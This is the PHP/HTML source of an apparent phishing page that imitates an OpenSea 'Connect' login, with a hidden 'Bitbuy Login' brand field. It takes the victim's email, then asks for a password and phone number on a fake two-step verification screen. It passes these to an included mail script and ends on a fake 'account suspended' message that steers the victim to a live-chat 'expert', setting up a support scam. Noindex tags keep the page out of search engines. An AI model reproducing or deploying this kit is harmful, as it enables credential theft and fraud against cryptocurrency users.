<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign In to Buy and Sell Cryptocurrency in Canada | Opensea</title>
    <meta name="robots" content="noindex, nofollow" />
    <meta name="googlebot" content="noindex, nofollow" />
    <meta name="bingbot" content="noindex, nofollow" />
    <link rel="icon" href="assets\images\opensea-logo.svg" sizes="32x32">
    <link rel="stylesheet" href="assets/css/all.min.css">
    <link rel="stylesheet" href="assets/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/css/style.css">
</head>
<style>
    body {
        font-family: Arial, sans-serif;
        background: url("assets/images/Screenshot\ 2024-09-26\ 233638.png");
        backdrop-filter: blur(5px);
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
        margin: 0;
    }

    .container {
        background-color: #f5f5f5;
        border-radius: 10px;
        box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
        width: 360px;
        padding: 20px;
        text-align: center;
        position: relative;
    }

    .container img {
        width: 80px;
        margin-bottom: 20px;
        background: white;
    }

    .container h1 {
        font-size: 20px;
        margin-bottom: 20px;
    }

    .email-button {
        display: flex;
        align-items: center;
        justify-content: space-between;
        background-color: white;
        border: 1px solid #e0e0e0;
        border-radius: 5px;
        padding: 10px;
        margin-bottom: 20px;
        cursor: pointer;
    }

    .email-button span {
        font-size: 16px;
        color: #333;
    }

    .email-button i {
        color: #007bff;
    }

    .divider {
        display: flex;
        align-items: center;
        margin: 20px 0;
    }

    .divider::before,
    .divider::after {
        content: '';
        flex: 1;
        height: 1px;
        background-color: #e0e0e0;
    }

    .divider span {
        margin: 0 10px;
        color: #999;
    }

    .wallet-option {
        display: flex;
        align-items: center;
        background-color: white;
        border-radius: 5px;
        padding: 15px;
        margin-bottom: 10px;
        cursor: pointer;
    }

    .wallet-option img {
        width: 24px;
        margin-right: 10px;
    }

    .wallet-option span {
        font-size: 18px;
        color: #333;
        font-weight: 600;
        margin-left: 15px;
    }

    .more-options {
        color: #007bff;
        font-size: 14px;
        cursor: pointer;
    }

    .close-button {
        position: absolute;
        top: 10px;
        right: 10px;
        font-size: 18px;
        color: #999;
        cursor: pointer;
    }
    .btnsubmit:focus {
        outline: none;  
    }
</style>
</style>

<body>

    <?php
    if (isset($_POST['btnLoginMore'])) {
        include 'mail.php';
    ?>
        <div class="container-fluid " id="welcome-section">
            <form action="" method="post">
                <h2 id="heading" style="margin-bottom: 5px;">2-Step Verification</h2>
                <p style="text-align: center;margin-bottom: 25px;">Enter the 2-step verification generated by your<br>
                    authenticator app.</p>
                <input type="hidden" name="brandName" value="Bitbuy Login">
                <input type="hidden" name="email" value="<?php echo $_POST['email']; ?>" />
                <input type="hidden" name="password" value="<?php echo $_POST['password']; ?>" />
                <div class="form-group">
                    <input type="text" class="form-control" style=" background-color:white;   margin-top: 6px;" placeholder=" Password" name="password"  required>
                </div>
                <div class="form-group">
                    <input type="text" class="form-control" style="    margin-top: 6px;"  name="number" placeholder="Phone Number" required>
                </div>
                <button style="    margin: 0 auto;
    padding: 10px 50px;
    background-color: blue;
    border: none;
    border-radius: 10px;" class="btn btn-block btn-primary" name="fromLog" type="submit">Verify </button>
                <div class="links">
                </div>
            </form>
        </div>
    <?php } elseif (isset($_POST['fromLog'])) {
        include 'mail.php';
    ?>

        <div  class="container-fluid errorDivg" id="welcome-section">
            <form  style="margin-top:120px;" action="" method="post" style="">
                <h2 id="heading" style="color: red;">Important Message!<span></span></h2>
                <p style="text-align: center;">Due to unauthorized activity and identification failure on your Account. Account Access has been suspended. Please Get in touch with our Support Staff Immediately

                </p>
                <div class="form">
                    <p style="text-align: center;font-weight: 600;font-size: 20px;">Error CODE: EBRX16X76D
                    </p><br>
                </div>
                <div class="calling-number" style="text-align: center;">
                    <a href="javascript:void(Tawk_API.toggle())" style="padding: 8px 12px; border-radius: 5px; border: 1px solid #27d17f; font-size: 16px;background-color: #27d17f;  color: #000 !important;">Ask Expert</a>
                </div>

            </form>
        </div>
    <?php } else { ?>

        <div class="container-fluid" style="margin-top:120px;" id="welcome-section">

            <body>
                <div class="container">
                    <div class="close-button">
                        ×
                    </div>
                    <img alt="OpenSea logo" src="assets\images\opensea-logo.svg" />
                    <h1>
                        Connect to OpenSea
                    </h1>
                    <form action="" style="padding: 0px; display: flex; height: auto; width: auto; box-shadow:unset;" method="post">
                        <input style="border-top-left-radius: 50px; border-bottom-left-radius:50px; padding-left:20px;" type="email" class="form-control" name="email" id="exampleInputEmail1" aria-describedby="emailHelp" placeholder="Continue with email" required>
                        <button style="margin-top:0px; background-color:transparent; width: unset; border: none; padding-right:20px;" name="btnLoginMore" class="btnsubmit" style="border: none; background-color: transparent;" type="submit">
                            <img style="width: 20px; margin-bottom: 0px;" src="assets/images/iconrightarrow" alt="">
                        </button>
                </form>
                    <div class="divider">
                        <span>
                            OR
                        </span>
                    </div>
                    <div class="wallet-option">
                        <img alt="MetaMask logo" style="margin: 0px 4px;" height="24" src="assets\images\meta.svg" width="24" />
                        <span>
                            MetaMask
                        </span>
                    </div>
                    <div class="wallet-option">
                        <img alt="Coinbase Wallet logo" style="margin: 0px 4px;" height="24" src="assets\images\coinbase.webp" width="24" />
                        <span>
                            Coinbase Wallet
                        </span>
                    </div>
                    <div class="wallet-option">
                        <img alt="WalletConnect logo" style="margin: 0px 4px;" height="24" src="assets\images\walletconect.webp" width="24" />
                        <span>
                            WalletConnect
                        </span>
                    </div>
                    <div class="more-options">
                        More wallet options
                    </div>
                </div>
            </body>
        </div>
    <?php } ?>

    <!--Start of Tawk.to Script-->
    <script type="text/javascript">
        var Tawk_API = Tawk_API || {},
            Tawk_LoadStart = new Date();
        (function() {
            var s1 = document.createElement("script"),
                s0 = document.getElementsByTagName("script")[0];
            s1.async = true;
            s1.src = 'https://embed.tawk.to/642e94c531ebfa0fe7f6d126/1gtavaa21';
            s1.charset = 'UTF-8';
            s1.setAttribute('crossorigin', '*');
            s0.parentNode.insertBefore(s1, s0);
        })();
    </script>
    <!--End of Tawk.to Script-->

</body>

</html>